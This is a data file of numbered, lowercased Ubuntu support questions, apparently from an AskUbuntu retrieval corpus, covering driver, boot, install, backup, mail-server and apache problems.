354589	undo changes to x86_64-linux-gnu_gl_conf	while running an application ( uhd_fft ) the following error occurred : xlib : extension `` glx '' missing on display `` :0 '' . in order to fix the problem i ran the following : update-alternatives -- force -- set x86_64-linux-gnu_gl_conf /usr/lib/x86_64-linux-gnu/mesa/ld.so.conf which i found at : https : //bugs.launchpad.net/ubuntu/+source/jockey/+bug/660443/comments/7 while this did fix the original problem my graphics are now poorer and my fan is constantly running . i would like to set x86_64-linux-gnu_gl_conf to what it was previously set to but i 'm not sure what this setting was . is there a way of finding the previous setting or can anyone suggest what it would most likely have been ? i 'm running 12.04 with an nvidia optimus graphics card on a dell inspiron 17r se thanks in advance .
354591	installing ubuntu 12.04 atapi issue	i am currently running windows 7 and thought it would be cool to test out ubuntu 12.04 , got my old hdd in my machine . i used wubi to install it . ( yes , i did format to fat32 ) . now i get this error : ata8.00 : failed command : identify packet device ata8.00 : cmd blah blah res blah blah ( ata bus error ) ata8.00 : status : { drdy } ata8 : hard resetting link i am running with : i7-2600 cpu @ 3.40 ghz 8 gb ram nvidia 660 ti if someone can help ?
354592	install ubuntu on a mac book single boot	i have a mac book ( 2006 ) 2 gb ram 2.2 ghz processor core 2 duo ( intel-based processor ) 80 gb hdd loaded with windows 7 x86 only ( single boot ) - i 've deleted the mac x os completely before and i do n't have any mac os dvds right now so here 's what i want to do : i want to install ubuntu 12.04.3 on my mac as a single boot ( and get rid of windows 7 ) how exactly can i do that ? ? and how can i also dual-boot ubuntu and windows 7 on this mac ? ( in case i want to in the future )
354594	ubuntu 13.04 damaged google earth	after upgrade to ubuntu 13.04 google earth stopped working in versions 6 and 7. in 6. -- -- the fly to function quit working and in version 7. -- -- the fly to works but no user uploaded pics will display all you get is a blank white box and on some , when you click the mouse on them g.e . shuts down . i know this is a ubuntu caused problem because i just installed g.e . in windows 7 and it is fully functional . ubuntu forums shows that many or maybe all users of 13.04 have this problem.surely by this time someone has taken time to find the fix . i do n't have programming skill so i ca n't do so . harlie further result ... .. i went back to ubuntu 12.04 and now it too will not work properly with google earth in ver . 7.- - - - so now it 's back to windows for g.e . harlie
354595	seeking ubuntu version compatibility resource	i have an older mac power pc g4 and i would like to know where i can find out which versions of ubuntu will run on it .
354596	is it possible to deploy an ubuntu sdk app to android ?	the latest version of ubuntu sdk and qtcreator has an option for cordova projects where potentially i could write an ubuntu app and then deploy to android . however , i want to deploy the app not using cordova . that means that instead of running the app on the `` desktop '' i would like to see in my android phone or in the android emulator most of the h ] treads focusses on portin androidn app to ubuntu , but my question is in the other direction . i want ot use qtcreator to deploy to ubuntu or android .
354599	can not install ubuntu with wubi	i placed the iso file with wubi file ( from the iso ) in the same folder ( mounted and unmounted ) but it always calls for the download of tar.xz file . i tried running wubi from the mounted iso with no sucess . i tried downloading the tar.xz file by myself from the ubuntu servers and placing it with wubi , it still calls for the download . i tried giving wubi the chance to download it but after about 1-2 hours it always gives me an error . i tried placing iso and tar.xz files on same folder and specifying the path on command line for wubi . i checked versions of everything and even firewall but everything failed . help . note : the wubi.exe from the i368 iso tries to download the amd64 version . i dont know whether that matters .
354601	display only working on ubuntu	i just installed ubuntu alongside windows , and now nothing is working right . when i turn on the machine , the display appears blank until the login screen appears . no os selection menu ( which i had ) , no ubuntu boot splash screen ( which was also appearing ) , nothing . i feel like the display is disabled until ubuntu boots up , because i do n't even get the manufacturer boot screen . for instance , when i press the delete key to enter the bios setup , the ubuntu login screen never appears , but neither does anything else . same as if i press the down arrow and enter at the time i assume the os selection menu is onscreen . except it 's not on screen , because the screen is n't even on - it remains off ( not just blank , i can tell it 's off ) . what do i do ? the weirdest part is that everything was working fine , manufacturer logo , boot selection , and ubuntu splash all appearing , for a few days , until today . in the beginning i did have some issues getting things to work since my system is uefi , but it was working , but now it has seemingly randomly stopped . one thing worth noting is that at one point after this malfunction i tried mounting the windows partition , and i got this error : the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . it 's certainly plausible that windows could be hibernated , but i have no idea how to un-hibernate it because of the above issue . my system is an asus q400a . intel core i7 3632qm , 8gb memory , hdd replaced with a 128gb crucial m4 ssd .
354603	dual monitors seen as one	i 'm running 12.04 lts and i have a second monitor plugged into my laptop . i took the option of an extended desktop , and it seems x considers it as only one big monitor . this causes me some pain ( for example , not being able to force conky to be always on my main laptop screen ) so i 'd like to know if there 's anything i can do to fix that . here is the output of xrandr -- query : screen 0 : minimum 320 x 200 , current 3286 x 1080 , maximum 8192 x 8192 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 293mm x 164mm 1366x768 59.4*+ 60.0 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected 1920x1080+1366+0 ( normal left inverted right x axis y axis ) 521mm x 293mm 1920x1080 60.0*+ 1680x1050 60.0 1600x900 60.0 1280x1024 75.0 60.0 1440x900 59.9 1280x800 59.8 1152x864 75.0 1280x720 60.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 72.8 75.0 66.7 60.0 720x400 70.1 hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) any help will be appreciated !
354604	used multiple encryption passwords , how to restore ?	i 'm not able to restore my deja dup backups because i used multiple passwords during encryption . the backups are stored on a local drive . here 's the output i got after trying duplicity : duplicity file : ///media/expansion\ drive/ubuntubackup /home/ghost/home output : synchronizing remote metadata to local cache ... gnupg passphrase : copying duplicity-full-signatures.20121231t202902z.sigtar.gpg to local cache . copying duplicity-full-signatures.20130421t034149z.sigtar.gpg to local cache . copying duplicity-full-signatures.20130909t193027z.sigtar.gpg to local cache . gpgerror : gpg failed , see log below : ===== begin gnupg log ===== gpg : cast5 encrypted data gpg : encrypted with 1 passphrase gpg : decryption failed : bad key ===== end gnupg log ===== i ca n't restore a single gpg backup , it needs a directory as input ( because i presume it does differential encryption ) . when i tried duplicity file : ///media/expansion\ drive/ubuntubackup/duplicity-full-signatures.20130909t193027z.sigtar.gpg /home/ghost/home here 's what i got : [ errno 20 ] not a directory : '/media/expansion drive/ubuntubackup/duplicity-full-signatures.20130909t193027z.sigtar.gpg'
354605	cmake could n't find boost	i ran cmake to compile blender then i got this error : couldnt find boost i have already installed libboost* 1.53 dev how can cmake find boost ? what should i add to cmakelist.txt ?
354606	can not install skype . unmet dependencies	i have had repeated issues with installing skype , and have attempted installing other dependencies . however , this one issue persists . this same error message has been repeated over the past three installation trials . # # # # # # # # @ ubuntu : ~ $ sudo apt-get install skype reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : skype : depends : skype-bin but it is not installable e : unable to correct problems , you have held broken packages .
354607	configure.ac permission denied	haxxm32 @ haxxm32-hp-elitebook-6930p : ~ $ '/home/haxxm32/sm-ssc/configure.ac ' bash : /home/haxxm32/sm-ssc/configure.ac : permission denied what do i do about this ? i tried to run this : haxxm32 @ haxxm32-hp-elitebook-6930p : ~ $ '/home/haxxm32/sm-ssc/autogen.sh ' aclocal-1.11 : `configure.ac ' or `configure.in ' is required autoconf : error : no input file autoheader : 'configure.ac ' or 'configure.in ' is required automake-1.11 : `configure.ac ' or `configure.in ' is required but as it said , this does n't run due to denied permissions . please help ?
354609	cloudera installation : failed to detect root privileges	i tried to install cdh on my ubuntu box ( one host ) . it fails on install : `` failed to detect root privileges . '' i know that cloudera needs user to have passwordless privileges ( `` root access to your hosts is required to install the cloudera packages . this installer will connect to your hosts via ssh and log in either directly as root or as another user with password-less sudo/pbrun privileges to become root. '' ) . how can i achieve that ? i tried to edit the /etc/sudoers file : % mygroup all = ( all ) nopasswd : all to give to mygroup root privileges ( with no password ) but it does not work . should i change my group to root ? should i do something with ssh keys ? any help will be appreciated . edit : in sudoers file , i added the line : foo all = nopasswd : all # foo is my username but with no more success at the install . in the details window , it says : detecting root privileges ... effective uid is 1000 begin which pbrun end ( 1 ) begin sudo -s id [ sudo ] password for foo : sorry , try again . [ sudo ] password for foo : sorry , try again . [ sudo ] password for foo : sorry , try again . sudo : 3 incorrect password attempts end ( 1 ) need root privileges but sudo requires password , exiting closing logging file descriptor
354612	how to run a script when i connect a device ?	new linux user here ( ubuntu 12.04 ) ... i 've been looking on google and found some scripts that would make what i 'm about to ask easier but what i would like to do is write a script that automatically opens terminal and runs the command 'easytether connect ' when i connect my phone to the computer ... is there any way to do this ?
354614	unlocking the disk enter passphrase : ?	i install ubuntu and any linux product for the first time , and right after the restart i got this message , please help , thank you ! unlocking the disk enter pass phrase : ?
354616	postfix 2.96 smtpd_relay_restrictions vs smtpd_reciepient_restrictions	we are setting up postfix.main.cf and if use smtpd_**relay**_restrictions = permit_mynetworks permit_sasl_authenticated reject_unauth_destination we get the warning of unused paramters when we 'service postfix restart if we comment out that line and instead use smtpd_**recipient**_restrictions = permit_mynetworks permit_sasl_authenticated reject_unauth_destination we dont get warning however this command is only supposed to work on much earlier versions of postfix ( prior to 2.1 ) . and also on the early version we maybe should use check_relay_domains instead of reject_unauth_destination ? ? ? maybe ? the only thing we can think of that somewhere other than postfix.main.cf there is the line smtpd_recipient_restrictions but we can not find this . help appreciated
354617	new touch os coming 10/17/2013	i have a nexus 7 . already put ubuntu 13.04 on it . i want to change to the new os when it comes out . step by step , what will i need to do to remove 13.04 and convert to this ? it 's ok to contact me by email choo_choo @ millect.com
354620	ca n't recover formatted ext4 partition file system . : ( suggestions ?	i 've been at this for days now , so i 'm hoping you can help me ! original setup : this is a 200gb firewire drive , originally formatted via ubuntu 11.04 disk manager with a master boot record , and a single ext4 partition . the partition was encrypted via disk manager option `` encrypt underlying file structure '' . the unencrypted partition originally contained a number of text files , and 2 63gb truecrypt file containers which originally resided on 64gb usb sticks . accidental format : a familiar story , i had another external with a similar setup and was planning on formatting one and using it as a backup for the original drive , which of course had no backup at the time . in disk manager , i had the original drive partition unlocked and not mounted . i selected the underlying partition via gui and clicked `` format partition '' as ext4 , no encryption . once i realized what was happening , i ripped the cable out and immediately made a copy with dd and am now working off that . status : since i did n't mess with the front of the drive , the luks header and mbr are still original and intact and the partition is unlockable via ubuntu popup dialog or command line . the unencrypted partition itself still has the same geometry , but since it received a partial format , the file system is presumably ( partially ? ) jacked . the new partition wo n't mount , and fsck returns `wrong fs type ' , bad superblock , etc . if i boot into ubuntu and plug in the drive without unlocking , /dev/mapper has a mapping with the uuid of the device ( i 'd copy it in here but i 'm currently booted into hiren 's ) . i 've noticed from plugging in other encrypted drives , they are mapped here by uuid on unlock , so i assume this is because the copy was made with dd with the partition still unlocked ? if i boot into hiren 's bootcd , and navigate to /dev/mapper , the above mapping is n't shown ( i assume this is due to how ubuntu handles encrypted drives ) . i can unlock via cryptsetup luksopen and successfully map the device here tho . fsck/e2fsck ca n't find a valid superblock on the mapped device on either ubuntu or hiren 's , i 've also tried every possible backup superblock to no avail . testdisk finds a series of junk partitions with weird sizes and filesystems which never existed on the drive . i 'm assuming this is due to collisions when it scans across the truecrypt file containers . as i understand it though , testdisk is primarily for recovering partition tables , not file systems , yes ? photorec only returns 3 junk files , as well as being useless for recovering the truecrypt file containers since they are encrypted from the first bit to the last . a hexdump -c on the mapped device shows 0 's until line 00020000 . ( does ubuntu zero-out data on format by default ? ? ? if this is the case , i know i 'm totally hopeless here . ) update : i 'm guessing t his is where the file system is stored at , is n't it ? question : i have a pretty low understanding of *nix command-line and low-level data storage , but have been learning a lot this week as i 've been working on this . since the format did n't complete , i have a hard time believing all the original superblocks are gone . the text files are expendible ( they were essentially archived emails ) , but i 'd very much like to have those truecrypt file containers back . unfortunately , i know this is maybe a slim chance because they 're gigantic encrypted files inside encryption . i 've seen mke2fs -s suggested and am going to try that after i finish making a fresh copy of the bad drive . is there any hope ? am i taking a wrong approach to this ? : ( this data represented months of work , and is usually backed up , it only had no backup for the one day because i 'm poor and was moving data around my hard drives trying to consolidate space . i figure if it took me that long to create it , it 's worth spending a few weeks trying to get back , so i 'm open to any amount of insane suggestions ( like , could n't i theoretically make a hexdump of the whole partition and recreate these 63gb files from that ? ) . thanks in advance ! : ) update : i have run mke2fs -s -t ext4 /dev/mapper/sdb1crypt ( forgot to copy the results , going to try it again , so i will post it then ) followed by e2fsck -y /dev/mapper/sdb1crypt which took about 10 hours to finish . on reboot , i found about 400,000 random files in lost+found folder . that ca n't be right , can it ? update 2 : i 've restored the backup to the accidentally-formatted state , and just for the hell of it , tried to grep the mapped device to see if it could find some file extensions i knew should be on it that are n't the truecrypt file containers i 'm looking for , and it picked these up immediately . # grep -r `` txt '' /dev/mapper/sdc1_crypt binary file /dev/mapper/sdc1_crypt matches # grep -r `` psd '' /dev/mapper/sdc1_crypt binary file /dev/mapper/sdc1_crypt matches # grep -r `` ai '' /dev/mapper/sdc1_crypt binary file /dev/mapper/sdc1_crypt matches # grep -r `` eps '' /dev/mapper/sdc1_crypt binary file /dev/mapper/sdc1_crypt matches i also ran # grep -r `` halsgonebad '' /dev/mapper/sdc1_crypt , because i know i have no files named that and it 's still searching ( been like 10min ) . what is grep finding , here ? does this mean my file system is partially intact somewhere ? gah ! i feel like i 'm so close ! i do n't know how inode tables work , but i wonder , can i possibly peruse the inode table somehow and just look for one that references a 63gb file ?
354621	how do i setup my hp c4140 printer wirelessly ?	i found a tutorial on how to install my c4140 printer driver . however , i have run into a snag . this is what the instructions say to do . i tried this , and this is what happens . hplip is installed , but i am doing something wrong.one of the things that i recently found is that i actually have hplip 3.13.3 and not version 3.13.9 . so that may solve my issue if i knew how to upgrade hplip . can anyone help me with this problem ? thank you in advance for all of your help .
354625	can not get any updates or installs because of server pt.archive.ubuntu.com ( 193.136.212.166 )	so , the terminal always gets stuck when trying to gets the packages from the server : pt.archive.ubuntu.com ( 193.136.212.166 ) . how can i use another server ? this has been like this all day . i asked a friend to try , and he could n't either . i 've done as suggested and ran sudo apt-get update -- fix-missing but it still gets stuck connecting to that server . ... 91 % [ a ligar a pt.archive.ubuntu.com ( 193.136.212.166 ) ] ... and then it fails ...
354626	after i login , the screen goes black and then `` no signal '' , as tho a shutdown occurred .	this is on 12.04 , note that before i login , i am presented with a normal screen except that there is a circle in the middle of it . when i move the mouse , then i have my login . but again , when i login , the screen goes black and am presented with `` no signal '' ,
354630	eee pc 701- if i create a dvd to install ubuntu will it auto reformat the hdd	the question is in the title , i did check the manual , google , help . but either i am missing something or just oversee . i have researched this for 2 days- i am very sorry to ask a question you have answered a million times .
354633	how can i get xbmc to stop force closing ?	i am having problems with xbmc running on ubuntu 12.04 when i click to open it , it just instantly closes itself after the xbmc logo screen goes away . i have uninstalled and reinstalled multiple times . i 'm not sure what to do now . i am very very new with linux , so go easy !
354639	move a partition out from under scp : why does it carry on ?	i was downloading , using scp , a large file from `` remote '' to `` myserver '' ; it is taking a few hours . it is/was downloading to `` ~/stuff/ '' . let 's call it `` x.tgz '' . then , forgetting about that , a little while later , i noticed disk space was getting low on the /home/ partition . i noticed `` ~/stuff/ '' was quite big , so decided to move it from my /home/ partition to my emptier /backup/ partition : cd ; mv stuff/ /backup/ great , reasonable amounts of disk space in all partitions again . then i remembered the long-running scp process , slapped my forehead , and went to look at it , expecting an error message . but it is still happily downloading . eh ? so , is it still being saved to /home/ partition , or the /backup/ partition ? i think i can answer that , as it appears disk space is still going down on /home/ but not /backup/ but , what will happen when it finally completes ? will i have a partial /backup/x.tgz and a full ~/stuff/x.tgz ? or the first half in /backup/x.tgz and the second half in ~/stuff/x.tgz ? more importantly : have i messed it up , and i should kill scp , and start again ?
354640	ubuntu installation is slow , why ?	i am currently installing ubuntu 12.04.3 . everything was going fine until i came across this ... installing system it is sssooooooo close to being finished ! like 1/6 of the way there ! i just wanted to know if this is normal or if something is wrong . i 'm installing it through a flash drive if that helps also , what will happen if i press the skip button that pops up when i click installing system ?
354642	bootloader does n't install	this is the 10th time i try to install ubuntu , i tried to install it alongside windows and i get the error executing grub-install /dev/sda failed . this is a fatal error . sorry , an error occurred and it was not possible to install the bootloader at the specified location . i get the option to install it on other locations which all fail . i also tried to install ubuntu through wubi which finishes installing but i when i try to load ubuntu it says that bootloader was not found . i also tried to install over windows and it also gives the same error leaving me with no operating system .
354643	what is the `` light display manager '' user account ?	i installed ubuntu 13.10 and suddenly i see a new user account to log in to ( besides mine ) , called `` light display manager '' . could someone explain why this account appears ?
354644	phone that i can put ubuntu on ?	i need a new phone . i 'd like to get a phone i can put ubuntu on . what phones can i do that on and still use it as a phone ? tim
354645	get list of installed packages - from damaged partition	i 'm running 13.04 on vmware fusion 6 on top of os x , which has some serious stability problems , necessitating hard reboots ( power cycling ) at least once/day if not more . since vmware is lame and does n't always write disk data to disk , it is very easy for virtual machines to get damaged when someone restarts the machine without shutting down the vm . at any rate , i 've got a virtual disk from my old vm which can be mounted in a new install , but i do n't know how to get a list of installed packages , since dpkg is looking at its new database and does n't care about the old one . there are a lot of issues with the old partition , files corrupted and such , so i ca n't just dd it to a new location . i figure the easiest way forward is to compile a list of packages i added post-install , then feed it to dpkg and apt-get as in this answer . my only problem is generating that list of packages . can anyone help ?
354652	gnome 3.10 after restart extensions are off	after i set my extensions on , if i logout and back in , things are fine , but if i restart , then every extension is off . running 13.10 ubuntu gnome and updated to gnome 3.10 thanks !
354658	apache shows blank white page after 2 to 10 hours	i am using ubuntu 12.04 , it has to network cards , a = internal 10.0.0.0 and b public ip , i have only apache2 installed , after 2 to 10 hours the website shows as a blank white page on the public network but continues to appear normally on the private 10.0.0.0 network , if i login or sometimes restart apache or the server the site comes back on the public network , but after 2 to 10 hours will become a blank white page and in chrome sometimes err_empty_response . the apache logs show no problems , the external firewall is setup and working properly , there is no port forwarding and the gateway on the server is correct . this is driving me crazy now , i have reinattled multiple times , removing php on the next install , i have 3 seperate servers all doing the same thing , i have a 4th email server which is fine , no problems , and 2 nameservers with no problems , all ubuntu 12.04 , this problem appeared about 3 months ago after the servers were working fine for 6 months , it just started , i had posted a similar post and closed it assuming it wasnt an ubuntu problem bu this has to be . not sure if it could be a security issue . i have performed the following security on all 3 . secure shared memory vi /etc/fstab tmpfs /dev/shm tmpfs defaults , noexec , nosuid 0 0 ssh hardening vi /etc/ssh/sshd_config permitrootlogin no protect su by limiting access only to admin group . sudo groupadd admin sudo usermod -a -g admin my-username sudo dpkg-statoverride -- update -- add root admin 4750 /bin/su harden network with sysctl settings ip spoofing protection net.ipv4.conf.all.rp_filter = 1 net.ipv4.conf.default.rp_filter = 1 ignore icmp broadcast requests net.ipv4.icmp_echo_ignore_broadcasts = 1 disable source packet routing net.ipv4.conf.all.accept_source_route = 0 net.ipv6.conf.all.accept_source_route = 0 net.ipv4.conf.default.accept_source_route = 0 net.ipv6.conf.default.accept_source_route = 0 ignore send redirects net.ipv4.conf.all.send_redirects = 0 net.ipv4.conf.default.send_redirects = 0 block syn attacks net.ipv4.tcp_syncookies = 1 net.ipv4.tcp_max_syn_backlog = 2048 net.ipv4.tcp_synack_retries = 2 net.ipv4.tcp_syn_retries = 5 log martians net.ipv4.conf.all.log_martians = 1 net.ipv4.icmp_ignore_bogus_error_responses = 1 ignore icmp redirects net.ipv4.conf.all.accept_redirects = 0 net.ipv6.conf.all.accept_redirects = 0 net.ipv4.conf.default.accept_redirects = 0 net.ipv6.conf.default.accept_redirects = 0 prevent ip spoofing vi /etc/host.conf order bind , hosts nospoof on then in apache i performed the following installed it apt-get install apache2 disable directory listings /etc/apache2/conf.d/security servertoken prod serversignature off disabling unnecessary modules a2dismod status a2dismod autoindex rm -f /etc/apache2/mods-enabled/autoindex.load rm -f /etc/apache2/mods-enabled/autoindex.conf rm -f /etc/apache2/mods-enabled/dav.load rm -f /etc/apache2/mods-enabled/dav_fs.conf rm -f /etc/apache2/mods-enabled/dav_fs.load rm -f /etc/apache2/mods-enabled/dav_lock.load also i have webmin installed on port 10000. if i login to webmin or ssh into the server using putty the site appers again sometimes on the public network , keep in mind the site appears normally the entire time on the private network and also if i 'm on the same subnet at the public network . it only across the net that this problem occurs , i have verizon fios with 10 public ip 's . this is my configuration , not sure if anything is creating an issue . any help would be greatly appreciated
354660	problem dual booting ubuntu with windows 8	so i got a new laptop an asus q501l and i went to install ubuntu 13.04 alongside windows 8 . i had problems booting to the liveusb but managed to work around the bios i ran the boot repair using the try ubuntu and installed ubuntu with the run alongside windows 8 option . well now when i boot it skips grub and goes straight to windows 8 and now when i try to log into the live usb it stops loading saying it can not mount so i ca n't re-run boot repair . any help would be nice because i need ubuntu in order to do some of my assignments .
354661	ssd cache for lenovo y500	i have a lenovo y500 with a dual gtx650m , 16gb ssd and 1tb hdd . i just install a clean ubuntu 13.04 then upgrade to 13.10 . previously i had windows 8 but i cleaned it off and only use ubuntu 13.10 since then . what i 'm trying to ask is that : is there any ssd cache out of the box for ubuntu 13.10 or do i have to manually enable them by using flashcache/dm-cache/bache/etc ? my current setting of ssd in my bios is ahci and y500 afaik does n't have raid option . so is there anything i can do to have an alternative to intel smart response technology that is available in windows 8 ? lastly , would it be better if i just install /root on the ssd with /home on hdd ? will there be any performance improvement using this set-up instead of ssd cache ? thank you in advance for your help . since i 'm very new to ubuntu , some links to existing tutorials or informations will be so much appreciated .
354662	my fn keys just stop working !	well i have ubuntu 12.04lts on my laptop . everything worked fine till last night . but today when i started my system it seems that my gaphic is a little different ( lower ) and there are something that just stop working like my fn keys wo n't work . my volume keys ( mute-lower-higher volume ) wo n't working anymore ! ! ! what 's the problem ? i did not change or update anything . the last time i used my system i was playing a game via wine . what should i do ?
354664	how do i actually disable f11-fullscreen on lubuntu 13.04 ?	i have already deleted the entry for f11-fullscreen from ~/.config/openbox/lubuntu-rc.xml even after a reboot , the f11 fullscreen functionality remains , and i ca n't use f11 in other applications as the key press is intercepted .
354665	if i have multiple openpgp keys in gnupg with the same user id/e-mail address , how can i distinguish between them ?	i have multiple openpgp keys that i am managing with gpg . the problem is , they have the same user id and the same e-mail address . how do i tell gpg the difference when i am , say , encrypting a file ?
354666	proxy internet problem on ubuntu ?	we have proxy internet at college and i can not access it on ubuntu . it works on browsers but it does n't work for any other application like the ubuntu software center . i tried to apply the network proxy settings system wide and it does n't work . it gives this error : failed to download the repository information check your internet connection using 172.16.0.2 with 8080 with user name and password . they use microsoft forefront threat management gateway for proxy server . help !
354667	run terminal code from a website	how could i execute a line of terminal code , like this java -xmx1024m -xms1024m -jar minecraft_server.jar nogui from the press of a button on a website hosted on the same machine ( with apache ) .
354671	require password even though i removed it	good day . one day i decided to remove the logon password from the setting . after that when i tried to change my other settings eg : install another language , ubuntu states it required authentication despite me removing the logon password in the setting . and when i entered the password ( after removing ) to authorize me , it says the password is wrong . can anyone help ? sorry for my poor english .
354674	games open on two screens with open source drivers	i 'm using ati open source drivers with an ati hd 3870 on ubuntu 13.04 . when i open games like teeworlds , they open stretched across both of my monitors . the card is not supported by fglrx.. and i even tried installing 12.04 and the legacy driver , but even the legacy driver said that my card was unsupported . how can i force the games to only open on one monitor ?
354675	where and how do i find the *desktop*.iso file needed to install universal usb installer ? i need it to install ubuntu	or maybe i do n't have that iso file . how do i have it ? where can i get it ?
354685	why am i stuck with a version of gnome shell unlike kde or other desktop environments ?	why am i stuck with a version of gnome shell unlike kde ? for example , on ubuntu 12.04 i am stuck with gnome shell version 3.4 , and i ca n't upgrade to a newer version of gnome shell like 3.6 . with kubuntu 12.04 comes with kde 4.8 and i can upgrade it to the latest version which is 4.10 . it seems like if a version of gnome shell gets released after a version of ubuntu , it does support that version of ubuntu . does anyone know why it is like this ? does this have something to do with gtk dependencies ?
354686	postgres does n't have hstore extension	i was trying to run the following command but i threw me any error . template1= # create extension hstore error : could not open extension control file `` usr/share/postgreesql/9.2/extension/hstore.control '' : no such file or directory it seems like i need to download the postgres-devel packages , but i do n't know exactly what i am missing . i installed my postgres with this command so i thought everything i need would be included together . sudo apt-get install postgres-9.2 any help will be appreciated . thank you .
354687	problem after installing ubuntu 13.04 on windows 8	after installing ubuntu 13.04 os on my windows8 . after restarting the machine , i provided the user name and passowrd , but its in the command prompt only . its not going to show my desktop like windows . please help me out of this problem please .
354689	changing permission for 'public ' folder always failed	i have 2 pc using ubuntu ( i assume pc 1 and pc 2 ) , and i always share a file or folder for each other . i know that i have to right click first , choose sharing options and check share this folder . after that i change their permission to 777. sudo chmod 777 public/ -r pc 1 always running correctly , but not for pc 2 . there is an error something like this : chmod : can not access 'public/ ' : no such file or directory eventually sharing will work for just only pc 1 which share a file and access it from pc 2 . but pc 2 can not share its file . where is the mistake ? and how do i solve this problem ? thanks for advance !
354692	ubuntu 's installer failed under installation	i was installing ubuntu 13.04 . everything went well , until it suddenly failed . here is what it said : we 're sorry , the installer has failed , when you close this window you can tell us about your problem . does anybody know about this problem ? it 's not the first time that i use ubuntu , i used 11.04 version already without problems .
354697	how do i run oracle vm virtualbox on ubuntu 13.04	this might be a very silly question . but i was using ubuntu 11.04 and i upgraded to 13.04 . i have installed oracle virtual box successfully . but i can not seems to find the application ( oracle vm box ) dashhome under applications ? how do i find the executable file that actually open the virtual box ? will it not be displayed under unity ?
354698	disk encryption failed and re-install wo n't work	i take full blame for this , but i screwed over my system and do n't know what to do next . here 's what happened , and i hope someone can give me advice on next steps . i have an acer aspire one , originally with windows 8 . i put 13.04 on a usb drive and successfully installed it . during the install , i removed all existing partitions etc , completely nuked windows 8 ( yay ! ) i used full disk encryption ( i still have this password ) everything worked fine , and this is where i made a mistake i decided i wanted to try another distro , and while i was downloading it , i decided to use the same ubuntu usb stick to boot up , then opened gparted , and 'deleted ' the partitions on the hard drive . the download of the other distro i wanted to try ( opensuse ) was taking too long so i went to bed . woke up , decided `` you know what , i 'll stick with ubuntu '' and so decided to reinstall from the same usb drive . this time i did not choose disk encryption , other than that , install was exactly the same . install seemed to go fine . at the end , i removed the usb drive , restarted . system message came up saying `` no bootable device '' re did installation , same problem freaked out , decided to try to use my opensuse thumbdrive to install that distro , during installation , opensuse recommended deleting all the existing partitions of ubuntu etc , which i allowed it to do . install went fine but after removing thumbdrive and restarting am still getting : `` no bootable device '' tried to do some research , some places indicating that i should be in legacy bios mode etc , but on my original install i was on uetf and it was fine . tried switching that in the bios and restarting . got a little further ( opensuse command line items started appearing , so i think it was starting to load up ) but eventually got bootable device message again . so i think i screwed up here . i am assuming this has something to do with the initial choice to encrypt the hard drive . or i messed up the partition tables , or similar . i do n't care about any lost data , all i want to do now is put in my ubuntu usb thumbdrive , wipe out all previous data , and install ubuntu again from scratch . i would really appreciate a step by step . i feel very lost on this .
354699	ubuntu on windows 8 on hp 2000 notebook pc	i have been trying to follow guides all through internet for installing ubuntu , but windows has hijacked my system in such a way that i am unable to install ubuntu even after 2 months of purchasing this new laptop . now this is unbearable for me . whenever i use boot dvd or anything else , it shows for options ; 1 ) try ubuntu 2 ) install ubuntu ... . i have tried everything , ( legacy mode on-off etc ) , but it just shows me a blank screen at boot . how can i get ubuntu up and running ?
354701	after 13.04 installation , computer only boots to windows	i just completed the installation process for ubuntu 13.04 , and when it completed it said it needed to restart . after restarting , windows 8 booted up , with no option for ubuntu whatsoever .
354703	ubuntu 12.10 slow after fresh installation	i have installed ubuntu 12.10 on my system with usb . after installation it seems that the system is slow . i think the problem is with its graphics card driver . the system that i am using is an hp pavilion dv6 laptop with a radeon hd 6400m/7400m ati graphics card . when i ran lspci -nn | grep vga in the terminal the output was : 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] seymour [ radeon hd 6400m/7400m series ] [ 1002:6760 ] i already tried running sudo apt-get install fglrx fglrx-amdcccle and that made the unity launcher disappear , so i reinstalled ubuntu 12.10 . how can i install the graphics driver for my hp pavilion dv6 laptop without losing the unity launcher ? update now its showing x.org x server amd/ati dsplay driver . but still its showing slow and the laptop temperature is increasing and after sometime laptop goes to shutdown automatically .
354704	monitor detected , but no screen	i have an dell xps 13 ( developer edition ) with ubuntu 12.04 and the raring lts kernel ( 3.8.0 ) . since today , i 'm not able to connect my external monitor anymore . the monitor is detected and the behaviour of ubuntu is like it is connected , but the screen is black and the monitor does n't find my laptop as input . i tried to connect another laptop to the monitor and it works , this means the monitor , the cable and the adapter are working . i also tried a kernel downgrade , which did n't help .
354710	matlab awesome wm	when i try to start matlab 2013a in ubuntu 12.04 i get only grey window . i found this post http : //awesome.naquadah.org/wiki/problems_with_java but i dont know where set it up . please help me
354712	a fatal error has been detected by the java runtime environment:	i installed zendstudio 3 days ago . i run it with sudo ./zendstudio command and every thing was ok but now when i run it with sudo command i get this error : administrator @ lakestan : ~/zendstudio $ sudo ./zendstudio a fatal error has been detected by the java runtime environment : sigsegv ( 0xb ) at pc=0x5bc182a6 , pid=6151 , tid=1562327872 jre version : java ( tm ) se runtime environment ( 7.0_40-b43 ) ( build 1.7.0_40-b43 ) java vm : java hotspot ( tm ) client vm ( 24.0-b56 mixed mode linux-x86 ) problematic frame : c [ libsqlite3.so+0x272a6 ] sqlite3_clear_bindings+0x236 failed to write core dump . core dumps have been disabled . to enable core dumping , try `` ulimit -c unlimited '' before starting java again an error report file with more information is saved as : /home/administrator/zendstudio/hs_err_pid6151.log if you would like to submit a bug report , please visit : http : //bugreport.sun.com/bugreport/crash.jsp and when i run it with non-sudo ( ./zendstudio ) command i get this error : locking is not possible in the directory `` /home/administrator/zendstudio/configuration/org.eclipse.osgi '' . a common reason is that the file system or runtime environment does not support file locking for that location . please choose a different location , or disable file locking passing `` -dosgi.locking=none '' as a vm argument . /home/administrator/zendstudio/configuration/org.eclipse.osgi/.manager/.filetablelock ( permission denied ) i 